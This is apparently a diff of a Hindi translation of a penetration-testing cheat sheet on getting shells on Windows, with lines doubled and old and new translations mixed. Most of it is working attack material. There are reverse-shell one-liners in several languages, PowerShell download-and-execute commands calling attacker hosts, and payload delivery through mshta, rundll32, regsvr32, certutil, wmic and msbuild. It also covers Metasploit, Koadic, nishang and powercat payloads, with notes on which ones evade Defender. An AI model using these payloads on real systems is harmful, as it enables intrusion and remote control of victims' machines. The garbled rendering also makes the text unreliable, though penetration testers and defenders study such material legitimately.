perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
``` ```
## रूबी ## रूबी
```bash ```bash
#Windows #Windows
ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
``` ```
## लुआ ## लुआ
```bash ```bash
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()' lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
``` ```
## OpenSSH ## OpenSSH
हम एक नए विंडोज शेल के लिए एक नए सत्र खोलेंगे। इसके लिए, हम एक नए सत्र खोलने के लिए निम्नलिखित कमांड का उपयोग करेंगे: हमलावर (काली)
```bash ```bash
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port> #Here you will be able to introduce the commands openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port> #Here you will be able to introduce the commands
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port2> #Here yo will be able to get the response openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port2> #Here yo will be able to get the response
``` ```
### Windows Command Shells
### Victim #### विंडोज कमांड शैल
शिकार 1. **Command Prompt (cmd.exe)**
यह स्टैंडर्ड विंडोज कमांड लाइन इंटरफेस है।
2. **PowerShell (powershell.exe)**
यह एक शक्तिशाली विंडोज कमांड शैल है जिसमें अधिक विस्तृत सुविधाएं हैं।
3. **Windows Management Instrumentation Command-line (WMIC)**
यह एक अन्य तरीका है जिसका उपयोग सिस्टम जानकारी को प्राप्त करने और प्रबंधित करने के लिए किया जा सकता है।
```bash ```bash
#Linux #Linux
openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2> openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
@ -97,36 +95,27 @@ openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_clien
#Windows #Windows
openssl.exe s_client -quiet -connect <ATTACKER_IP>:<PORT1>|cmd.exe|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2> openssl.exe s_client -quiet -connect <ATTACKER_IP>:<PORT1>|cmd.exe|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
``` ```
## पावरशेल
## Powershell
```bash ```bash
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex" powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')" powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')"
Start-Process -NoNewWindow powershell "IEX(New-Object Net.WebClient).downloadString('http://10.222.0.26:8000/ipst.ps1')" Start-Process -NoNewWindow powershell "IEX(New-Object Net.WebClient).downloadString('http://10.222.0.26:8000/ipst.ps1')"
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile
``` ```
प्रक्रिया नेटवर्क कॉल कर रही है: **powershell.exe**\
जाल कॉल करने वाली प्रक्रिया: **powershell.exe**\ डिस्क पर लिखी गई पेलोड: **NO** (_कम से कम कहीं नहीं मिला procmon का उपयोग करके!_)
डिस्क पर लिखी गई पेलोड: **नहीं** (_कम से कम जहां तक मुझे प्रोसेस मॉनिटरिंग करते समय मिला है!_)
```bash ```bash
powershell -exec bypass -f \\webdavserver\folder\payload.ps1 powershell -exec bypass -f \\webdavserver\folder\payload.ps1
``` ```
**एक लाइनर:**
**नेटवर्क कॉल करने वाली प्रक्रिया:** **svchost.exe**\
**डिस्क पर लिखा गया पेलोड:** **WebDAV क्लाइंट स्थानीय कैश**
```bash ```bash
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() $client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
``` ```
**इस दस्तावेज़ के अंत में विभिन्न पावरशेल शैलों के बारे में अधिक जानकारी प्राप्त करें**
**इस दस्तावेज़ के अंत में विभिन्न पावरशेल शैलियों के बारे में अधिक जानकारी प्राप्त करें**
## Mshta ## Mshta
* [यहाँ से](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) * [यहाँ से](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
```bash ```bash
mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")")) mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
``` ```
@ -138,19 +127,15 @@ mshta http://webserver/payload.hta
```bash ```bash
mshta \\webdavserver\folder\payload.hta mshta \\webdavserver\folder\payload.hta
``` ```
#### **hta-psh रिवर्स शैल का उदाहरण (hta का उपयोग करके PS बैकडोर डाउनलोड और चलाना)** #### **hta-psh रिवर्स शैल का उदाहरण (hta का उपयोग करके PS बैकडोर डाउनलोड और चलाना)**
```xml ```xml
<scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -ep bypass -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('http://119.91.129.12:8080/1.ps1')"</scRipt> <scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -ep bypass -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('http://119.91.129.12:8080/1.ps1')"</scRipt>
``` ```
**आप बहुत आसानी से एक Koadic zombie को stager hta का उपयोग करके डाउनलोड और निष्पादित कर सकते हैं** **आप बहुत आसानी से एक Koadic zombie को stager hta का उपयोग करके डाउनलोड और निष्पादित कर सकते हैं**
#### hta उदाहरण #### hta उदाहरण
[**यहाँ से**](https://gist.github.com/Arno0x/91388c94313b70a9819088ddf760683f) [**यहाँ से**](https://gist.github.com/Arno0x/91388c94313b70a9819088ddf760683f)
```xml ```xml
<html> <html>
<head> <head>
@ -165,11 +150,9 @@ new ActiveXObject('WScript.Shell').Run(c);
</body> </body>
</html> </html>
``` ```
#### **mshta - sct** #### **mshta - sct**
[**यहाँ से**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17) [**यहाँ से**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17)
```xml ```xml
<?XML version="1.0"?> <?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); --> <!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
@ -185,9 +168,7 @@ var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
</script> </script>
</scriptlet> </scriptlet>
``` ```
#### **Mshta - Metasploit** #### **Mshta - Metasploit**
```bash ```bash
use exploit/windows/misc/hta_server use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109 msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109
@ -198,15 +179,13 @@ msf exploit(windows/misc/hta_server) > exploit
```bash ```bash
Victim> mshta.exe //192.168.1.109:8080/5EEiDSd70ET0k.hta #The file name is given in the output of metasploit Victim> mshta.exe //192.168.1.109:8080/5EEiDSd70ET0k.hta #The file name is given in the output of metasploit
``` ```
**डिफेंडर द्वारा पहचाना गया** **डिफेंडर द्वारा पहचाना गया**
## **Rundll32** ## **Rundll32**
[**Dll हैलो वर्ल्ड उदाहरण**](https://github.com/carterjones/hello-world-dll) [**Dll hello world उदाहरण**](https://github.com/carterjones/hello-world-dll)
* [यहाँ से](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) * [यहाँ से](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
```bash ```bash
rundll32 \\webdavserver\folder\payload.dll,entrypoint rundll32 \\webdavserver\folder\payload.dll,entrypoint
``` ```
@ -214,13 +193,11 @@ rundll32 \\webdavserver\folder\payload.dll,entrypoint
```bash ```bash
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close(); rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();
``` ```
**डिफेंडर द्वारा पहचाना गया** **डिफेंडर द्वारा पहचाना गया**
**Rundll32 - sct** **Rundll32 - sct**
[**यहाँ से**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17) [**यहाँ से**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17)
```xml ```xml
<?XML version="1.0"?> <?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); --> <!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
@ -235,17 +212,13 @@ var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
</script> </script>
</scriptlet> </scriptlet>
``` ```
#### **Rundll32 - Metasploit** #### **Rundll32 - Metasploit**
```bash ```bash
use windows/smb/smb_delivery use windows/smb/smb_delivery
run run
#You will be given the command to run in the victim: rundll32.exe \\10.2.0.5\Iwvc\test.dll,0 #You will be given the command to run in the victim: rundll32.exe \\10.2.0.5\Iwvc\test.dll,0
``` ```
**Rundll32 - कोडिक**
**Rundll32 - Koadic**
```bash ```bash
use stager/js/rundll32_js use stager/js/rundll32_js
set SRVHOST 192.168.1.107 set SRVHOST 192.168.1.107
@ -254,11 +227,9 @@ run
#Koadic will tell you what you need to execute inside the victim, it will be something like: #Koadic will tell you what you need to execute inside the victim, it will be something like:
rundll32.exe javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","http://10.2.0.5:9997/ownmG",false);x.send();eval(x.responseText);window.close(); rundll32.exe javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","http://10.2.0.5:9997/ownmG",false);x.send();eval(x.responseText);window.close();
``` ```
## Regsvr32 ## Regsvr32
* [यहाँ से](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) * [यहाँ से](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
```bash ```bash
regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
``` ```
@ -266,13 +237,11 @@ regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
``` ```
regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
``` ```
**डिफेंडर द्वारा पहचाना गया** **डिफेंडर द्वारा पहचाना गया**
#### Regsvr32 -sct #### Regsvr32 -sct
[**यहाँ से**](https://gist.github.com/Arno0x/81a8b43ac386edb7b437fe1408b15da1) [**यहाँ से**](https://gist.github.com/Arno0x/81a8b43ac386edb7b437fe1408b15da1)
```markup ```markup
<?XML version="1.0"?> <?XML version="1.0"?>
<!-- regsvr32 /u /n /s /i:http://webserver/regsvr32.sct scrobj.dll --> <!-- regsvr32 /u /n /s /i:http://webserver/regsvr32.sct scrobj.dll -->
@ -289,9 +258,7 @@ var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
</registration> </registration>
</scriptlet> </scriptlet>
``` ```
#### **रेग्सवर32 - मेटास्प्लॉइट**
#### **Regsvr32 - Metasploit**
```bash ```bash
use multi/script/web_delivery use multi/script/web_delivery
set target 3 set target 3
@ -300,7 +267,6 @@ set lhost 10.2.0.5
run run
#You will be given the command to run in the victim: regsvr32 /s /n /u /i:http://10.2.0.5:8080/82j8mC8JBblt.sct scrobj.dll #You will be given the command to run in the victim: regsvr32 /s /n /u /i:http://10.2.0.5:8080/82j8mC8JBblt.sct scrobj.dll
``` ```
**आप बहुत आसानी से एक Koadic zombie को डाउनलोड और execute कर सकते हैं stager regsvr का उपयोग करके** **आप बहुत आसानी से एक Koadic zombie को डाउनलोड और execute कर सकते हैं stager regsvr का उपयोग करके**
## Certutil ## Certutil
@ -308,42 +274,32 @@ run
* [यहाँ से](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) * [यहाँ से](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
एक B64dll डाउनलोड करें, इसे डीकोड करें और इसे execute करें। एक B64dll डाउनलोड करें, इसे डीकोड करें और इसे execute करें।
```bash ```bash
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
``` ```
एक B64exe डाउनलोड करें, इसे डीकोड करें और इसे चलाएं। एक B64exe डाउनलोड करें, इसे डीकोड करें और इसे चलाएं।
```bash ```bash
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe
``` ```
**डिफेंडर द्वारा पहचाना गया** **डिफेंडर द्वारा पहचाना गया**
## **Cscript/Wscript**
## **Cscript/Wscript**
```bash ```bash
powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://10.2.0.5:8000/reverse_shell.vbs',\"$env:temp\test.vbs\");Start-Process %windir%\system32\cscript.exe \"$env:temp\test.vbs\"" powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://10.2.0.5:8000/reverse_shell.vbs',\"$env:temp\test.vbs\");Start-Process %windir%\system32\cscript.exe \"$env:temp\test.vbs\""
``` ```
**Cscript - Metasploit** **Cscript - Metasploit**
```bash ```bash
msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 -f vbs > shell.vbs msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 -f vbs > shell.vbs
``` ```
**डिफेंडर द्वारा पहचाना गया** **डिफेंडर द्वारा पहचाना गया**
## PS-Bat ## PS-Bat
```bash ```bash
\\webdavserver\folder\batchfile.bat \\webdavserver\folder\batchfile.bat
``` ```
जाल संचालन कॉल कर रही प्रक्रिया: **svchost.exe**\
जांच करने वाली प्रक्रिया: **svchost.exe**\ डिस्क पर लिखी गई पेलोड: **WebDAV क्लाइंट स्थानीय कैश**
डिस्क पर लिखी गई पेलोड: **WebDAV client local cache**
```bash ```bash
msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 > shell.bat msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 > shell.bat
impacket-smbserver -smb2support kali `pwd` impacket-smbserver -smb2support kali `pwd`
@ -352,36 +308,28 @@ impacket-smbserver -smb2support kali `pwd`
```bash ```bash
\\10.8.0.3\kali\shell.bat \\10.8.0.3\kali\shell.bat
``` ```
**डिफेंडर द्वारा पहचाना गया** **डिफेंडर द्वारा पहचाना गया**
## **MSIExec** ## **MSIExec**
हमलावर हमलावार
``` ```
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.2.0.5 lport=1234 -f msi > shell.msi msfvenom -p windows/meterpreter/reverse_tcp lhost=10.2.0.5 lport=1234 -f msi > shell.msi
python -m SimpleHTTPServer 80 python -m SimpleHTTPServer 80
``` ```
शिकार: शिकार:
``` ```
victim> msiexec /quiet /i \\10.2.0.5\kali\shell.msi victim> msiexec /quiet /i \\10.2.0.5\kali\shell.msi
``` ```
**पहचाना गया** **पहचाना गया**
## **Wmic** ## **Wmic**
* [यहाँ से](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) * [यहाँ से](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
```bash ```bash
wmic os get /format:"https://webserver/payload.xsl" wmic os get /format:"https://webserver/payload.xsl"
``` ```
उदाहरण xsl फ़ाइल [यहाँ से](https://gist.github.com/Arno0x/fa7eb036f6f45333be2d6d2fd075d6a7): उदाहरण xsl फ़ाइल [यहाँ से](https://gist.github.com/Arno0x/fa7eb036f6f45333be2d6d2fd075d6a7):
```xml ```xml
<?xml version='1.0'?> <?xml version='1.0'?>
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0"> <stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0">
@ -393,36 +341,29 @@ var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c echo IEX(New-Object N
</ms:script> </ms:script>
</stylesheet> </stylesheet>
``` ```
**नहीं पहचाना गया** **नहीं पहचाना गया**
**आप बहुत आसानी से एक Koadic zombie डाउनलोड और एक्जीक्यूट कर सकते हैं उसिंग स्टेजर wmic** **आप बहुत आसानी से एक Koadic zombie को डाउनलोड और एक्जीक्यूट कर सकते हैं उस्ताद wmic का उपयोग करके**
## Msbuild ## Msbuild
* [यहाँ से](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) * [यहाँ से](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
``` ```
cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml" cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"
``` ```
आप इस तकनीक का उपयोग ऐप्लिकेशन व्हाइटलिस्टिंग और Powershell.exe प्रतिबंधों को अनदेखा करने के लिए कर सकते हैं। जैसे ही आपको एक PS शैल मिलेगा।\ आप इस तकनीक का उपयोग ऐप्लिकेशन व्हाइटलिस्टिंग और Powershell.exe प्रतिबंधों को अनदेखा करने के लिए कर सकते हैं। जैसे ही आपको एक PS शैल मिलेगा।\
बस इसे डाउनलोड करें और इसे निष्पादित करें: [https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj](https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj) बस इसे डाउनलोड करें और इसे निष्पादित करें: [https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj](https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj)
``` ```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj
``` ```
**नहीं पहचाना गया**
**नहीं पहचाना** ## **सीएससी**
## **CSC**
विक्टिम मशीन में C# कोड कंपाइल करें।
विक्टिम मशीन में सीशार्प कोड कंपाइल करें।
``` ```
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:shell.exe shell.cs C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:shell.exe shell.cs
``` ```
आप यहाँ से एक मौलिक C# रिवर्स शैल डाउनलोड कर सकते हैं: [https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc](https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc) आप यहाँ से एक मौलिक C# रिवर्स शैल डाउनलोड कर सकते हैं: [https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc](https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc)
**नहीं पता चला** **नहीं पता चला**
@ -430,11 +371,9 @@ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:shell.exe s
## **Regasm/Regsvc** ## **Regasm/Regsvc**
* [यहाँ से](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) * [यहाँ से](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
```bash ```bash
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll
``` ```
**मैंने इसे प्रयास नहीं किया** **मैंने इसे प्रयास नहीं किया**
[**https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182**](https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182) [**https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182**](https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182)
@ -442,53 +381,44 @@ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\fol
## Odbcconf ## Odbcconf
* [यहाँ से](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) * [यहाँ से](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
```bash ```bash
odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt} odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
``` ```
**मैंने इसे प्रयास नहीं किया** **मैंने इसे प्रयास नहीं किया**
[**https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2**](https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2) [**https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2**](https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2)
## Powershell शैल्स ## पावरशेल शैल्स
### PS-Nishang ### PS-Nishang
[https://github.com/samratashok/nishang](https://github.com/samratashok/nishang) [https://github.com/samratashok/nishang](https://github.com/samratashok/nishang)
**शैल्स** फ़ोल्डर में, कई विभिन्न शैल्स हैं। डाउनलोड और Invoke-_PowerShellTcp.ps1_ को क्रियान्वित करने के लिए स्क्रिप्ट की एक प्रति बनाएं और फ़ाइल के अंत में जोड़ें: **शैल्स** फोल्डर में, कई विभिन्न शैल्स हैं। डाउनलोड और Invoke-_PowerShellTcp.ps1_ को क्रियान्वित करने के लिए स्क्रिप्ट की एक प्रति बनाएं और फ़ाइल के अंत में जोड़ें:
``` ```
Invoke-PowerShellTcp -Reverse -IPAddress 10.2.0.5 -Port 4444 Invoke-PowerShellTcp -Reverse -IPAddress 10.2.0.5 -Port 4444
``` ```
एक वेब सर्वर में स्क्रिप्ट सर्व करना शुरू करें और पीड़ित के अंत में इसे निष्पादित करें: एक वेब सर्वर में स्क्रिप्ट सर्व करना शुरू करें और पीड़ित के अंत में इसे निष्पादित करें:
``` ```
powershell -exec bypass -c "iwr('http://10.11.0.134/shell2.ps1')|iex" powershell -exec bypass -c "iwr('http://10.11.0.134/shell2.ps1')|iex"
``` ```
Defender इसे दुष्ट कोड के रूप में नहीं पहचानता है (अभी तक, 3/04/2019). Defender इसे दुष्ट कोड के रूप में नहीं पहचानता है (अभी तक, 3/04/2019).
**TODO: अन्य nishang शैल्स की जाँच करें** **TODO: अन्य निशांग शैल्स की जाँच करें**
### **PS-Powercat** ### **PS-Powercat**
[**https://github.com/besimorhino/powercat**](https://github.com/besimorhino/powercat) [**https://github.com/besimorhino/powercat**](https://github.com/besimorhino/powercat)
डाउनलोड करें, एक वेब सर्वर शुरू करें, सुनने वाला शुरू करें, और पीड़ित के अंत में इसे क्रियान्वित करें: डाउनलोड करें, एक वेब सर्वर शुरू करें, सुनने वाला शुरू करें, और पीड़ित के अंत में इसे क्रियान्वित करें:
``` ```
powershell -exec bypass -c "iwr('http://10.2.0.5/powercat.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd" powershell -exec bypass -c "iwr('http://10.2.0.5/powercat.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"
``` ```
Defender इसे दुष्ट कोड के रूप में नहीं पहचानता है (अभी तक, 3/04/2019).
**डिफेंडर इसे दुष्ट कोड के रूप में नहीं पहचानता है (अभी तक, 3/04/2019).**
**पावरकैट द्वारा प्रस्तावित अन्य विकल्प:** **पावरकैट द्वारा प्रस्तावित अन्य विकल्प:**
बाइंड शैल, रिवर्स शैल (TCP, UDP, DNS), पोर्ट पुनर्निर्देशन, अपलोड/डाउनलोड, पेलोड उत्पन्न करें, फ़ाइल सर्व करें... बाइंड शैल, रिवर्स शैल (TCP, UDP, DNS), पोर्ट पुनर्निर्देशन, अपलोड/डाउनलोड, पेलोड उत्पन्न करें, फ़ाइल सर्व करें...
``` ```
Serve a cmd Shell: Serve a cmd Shell:
powercat -l -p 443 -e cmd powercat -l -p 443 -e cmd
@ -505,17 +435,14 @@ powercat -c 10.1.1.15 -p 443 -e cmd -g
Start A Persistent Server That Serves a File: Start A Persistent Server That Serves a File:
powercat -l -p 443 -i C:\inputfile -rep powercat -l -p 443 -i C:\inputfile -rep
``` ```
### इम्पायर ### इम्पायर
[https://github.com/EmpireProject/Empire](https://github.com/EmpireProject/Empire) [https://github.com/EmpireProject/Empire](https://github.com/EmpireProject/Empire)
एक पावरशेल लॉन्चर बनाएं, इसे एक फ़ाइल में सहेजें और उसे डाउनलोड और निष्पादित करें। एक पावरशेल लॉन्चर बनाएं, इसे एक फ़ाइल में सहेजें और उसे डाउनलोड और निष्पादित करें।
``` ```
powershell -exec bypass -c "iwr('http://10.2.0.5/launcher.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd" powershell -exec bypass -c "iwr('http://10.2.0.5/launcher.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"
``` ```
**कोई दुर्भाग्यपूर्ण कोड के रूप में पहचाना गया** **कोई दुर्भाग्यपूर्ण कोड के रूप में पहचाना गया**
### MSF-Unicorn ### MSF-Unicorn
@ -523,28 +450,22 @@ powershell -exec bypass -c "iwr('http://10.2.0.5/launcher.ps1')|iex;powercat -c
[https://github.com/trustedsec/unicorn](https://github.com/trustedsec/unicorn) [https://github.com/trustedsec/unicorn](https://github.com/trustedsec/unicorn)
यूनिकॉर्न का उपयोग करके मेटास्प्लॉइट बैकडोर का पावरशेल संस्करण बनाएं यूनिकॉर्न का उपयोग करके मेटास्प्लॉइट बैकडोर का पावरशेल संस्करण बनाएं
``` ```
python unicorn.py windows/meterpreter/reverse_https 10.2.0.5 443 python unicorn.py windows/meterpreter/reverse_https 10.2.0.5 443
``` ```
बनाए गए संसाधन के साथ msfconsole शुरू करें: बनाए गए संसाधन के साथ msfconsole शुरू करें:
``` ```
msfconsole -r unicorn.rc msfconsole -r unicorn.rc
``` ```
एक वेब सर्वर शुरू करें जो _powershell\_attack.txt_ फ़ाइल को सेव कर रहा है और पीड़ित पर निम्नलिखित को क्रियान्वित करें:
विक्टिम में निम्नलिखित को निष्पादित करें:
``` ```
